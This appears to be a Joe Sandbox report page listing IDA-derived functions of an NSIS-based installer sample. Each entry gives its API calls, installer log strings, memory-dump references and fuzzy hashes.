Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86

Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
GetProcAddress.KERNEL32(00000000), ref: 00406327

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC

Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
FindClose.KERNEL32(00000000), ref: 004062EC

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
ShowWindow.USER32(?), ref: 004054D2
DestroyWindow.USER32 ref: 004054E6
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
GetDlgItem.USER32(?,?), ref: 00405523
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
IsWindowEnabled.USER32(00000000), ref: 0040553E
GetDlgItem.USER32(?,00000001), ref: 004055ED
GetDlgItem.USER32(?,00000002), ref: 004055F7
KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00405611
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
GetDlgItem.USER32(?,00000003), ref: 00405708
ShowWindow.USER32(00000000,?), ref: 0040572A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
EnableWindow.USER32(?,?), ref: 00405757
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
EnableMenuItem.USER32(00000000), ref: 00405774
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
SetWindowTextW.USER32(?,00447240), ref: 004057DC
ShowWindow.USER32(?,0000000A), ref: 00405910

Strings

@rD, xrefs: 004057B9

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
String ID: @rD
API String ID: 3906175533-3814967855
Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

Rename failed: %s, xrefs: 0040194B
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
Rename: %s, xrefs: 004018F8
detailprint: %s, xrefs: 00401679
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Sleep(%d), xrefs: 0040169D
CreateDirectory: "%s" (%d), xrefs: 004017BF
Call: %d, xrefs: 0040165A
Rename on reboot: %s, xrefs: 00401943
Aborting: "%s", xrefs: 0040161D
SetFileAttributes failed., xrefs: 004017A1
CreateDirectory: "%s" created, xrefs: 00401849
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
BringToFront, xrefs: 004016BD
Jump: %d, xrefs: 00401602

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
RegisterClassW.USER32(0046AD60), ref: 00405B0A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B

Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30

ShowWindow.USER32(00000005,00000000), ref: 00405B91
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
RegisterClassW.USER32(0046AD60), ref: 00405BD3
DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2

Strings

B%F, xrefs: 00405A1F
@rD, xrefs: 00405965
_Nb, xrefs: 00405AD1
RichEdit, xrefs: 00405BC4
.exe, xrefs: 00405A3D
RichEd20, xrefs: 00405B9D
.DEFAULT\Control Panel\International, xrefs: 00405999
RichEdit20A, xrefs: 00405BB6, 00405BBB
RichEd32, xrefs: 00405BA8
@%F, xrefs: 004059F6
Control Panel\Desktop\ResourceLocale, xrefs: 00405972

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-1650083594
Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

lstrcatW.KERNEL32(00000000,00000000,133,004CB0B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,133,133,00000000,00000000,133,004CB0B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Strings

133, xrefs: 00401A53, 00401A5C, 00401A69, 00401A7B, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: error creating "%s", xrefs: 00401AF0
File: wrote %d to "%s", xrefs: 00401BD0
File: error, user cancel, xrefs: 00401B93
File: error, user abort, xrefs: 00401B53
File: error, user retry, xrefs: 00401B40
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: 133$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
API String ID: 4286501637-855710077
Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403598
GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600

Strings

Inst, xrefs: 0040366C
Error launching installer, xrefs: 004035D7
Null, xrefs: 0040367E
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
soft, xrefs: 00403675

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033E7
GetTickCount.KERNEL32 ref: 00403464
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
wsprintfW.USER32 ref: 004034A4
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A

Strings

X1C, xrefs: 0040343C
P1B, xrefs: 004033A9
X1C, xrefs: 004033ED
... %d%%, xrefs: 0040349E

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$P1B$X1C$X1C
API String ID: 651206458-1535804072
Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GlobalFree.KERNELBASE(008F03F8), ref: 00402387

Strings

133, xrefs: 00401EFB, 00401F00, 00401F1A
Pop: stack empty, xrefs: 00401F2C
Exch: stack < %d elements, xrefs: 00401ED8

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: 133$Exch: stack < %d elements$Pop: stack empty
API String ID: 1459762280-1693954257
Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

GlobalFree.KERNELBASE(008F03F8), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
